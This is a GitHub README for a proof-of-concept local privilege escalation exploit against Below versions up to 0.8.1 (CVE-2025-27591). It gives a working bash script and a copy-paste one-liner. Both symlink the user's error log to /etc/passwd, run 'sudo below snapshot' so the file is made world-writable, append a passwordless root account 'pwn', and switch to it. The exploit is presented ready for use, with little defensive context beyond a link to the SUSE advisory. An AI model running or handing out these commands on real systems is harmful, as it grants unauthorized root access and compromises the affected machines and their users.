# Below - Local Privilege Escalation (CVE-2025-27591)

<br><br>
<div align="center">
  <img width="250" src="https://raw.githubusercontent.com/facebookincubator/below/main/img/below_logo_horizontal.png" alt="below-logo"> <br><br>
  <p>Below <= v0.8.1<br>
  <b>Local Privilege Escalation via World-Writable Log Symlink</b> <br>
    PoC Exploit<br>
  </p>
  <br><br>
  <img src="https://www.zyenra.com/assets/img/below-pe.png">
</div>



---

### Introduction

`Below` versions <= 0.8.1 contains a critical local privilege escalation vulnerability (CVE-2025-27591).  
Due to a misconfigured world-writable log directory (`/var/log/below/`) and insecure permission logic in the Rust codebase, a local attacker can symlink `error_<user>.log` to any root-owned file like `/etc/passwd`.  

When `below snapshot` is executed with `sudo`, it forcibly sets mode `0666` on the log file and writes to it—even if it's a symlink.  
This allows injection of a `root`-privileged user without password, leading to full root shell access.

---

### Usage

```bash
git clone https://github.com/rvizx/CVE-2025-27591
cd CVE-2025-27591
chmod +x exploit.sh
./exploit.sh
````

**OR**



Exploit Code 

```bash
# Title  : Below v0.8.1 - Local Privilege Escalation (CVE-2025-27591) - PoC Exploit
# Author : Ravindu Wickramasinghe (aka rvz)
# Usage  : usage: ./exploit.sh


u=$(id -un)
rm -f /var/log/below/error_"$u".log
ln -s /etc/passwd /var/log/below/error_"$u".log # symlink log file to /etc/passwd
export LOGS_DIRECTORY=/var/log/below
sudo /usr/bin/below snapshot --begin now 2>/dev/null || true # below chmods 0666 the symlink target and writes to it
echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd # append pwn (root-priv) user entry  to /etc/passwd (now writable)
su pwn
```

*Note: Added exploit.sh to README.md after IppSec used the one-liner instead of the exploit.sh in his walkthrough. Thought this would be easier for everyone. Thanks IppSec. ^^* 


**OR**


One-liner - (Copy, paste and execute)

```bash
u=$(id -un); rm -f /var/log/below/error_"$u".log; ln -s /etc/passwd /var/log/below/error_"$u".log; export LOGS_DIRECTORY=/var/log/below; sudo /usr/bin/below snapshot --begin now 2>/dev/null || true; echo 'pwn::0:0:root:/root:/bin/bash' >> /etc/passwd; su pwn
```

---

### Environment

* Below <= v0.8.1
* Systemd-managed Linux (Ubuntu, Arch, Fedora, etc.)
* User in `sudo` group with `NOPASSWD` access to `/usr/bin/below *`

---

### Credits

Discovered and reported by Matthias Gerstner @ SUSE - [Security Advisory](https://security.opensuse.org/2025/03/12/below-world-writable-log-dir.html) <br>
PoC Exploit - Ravindu Wickramasinhge AKA [rvz](https://github.com/rvizx)
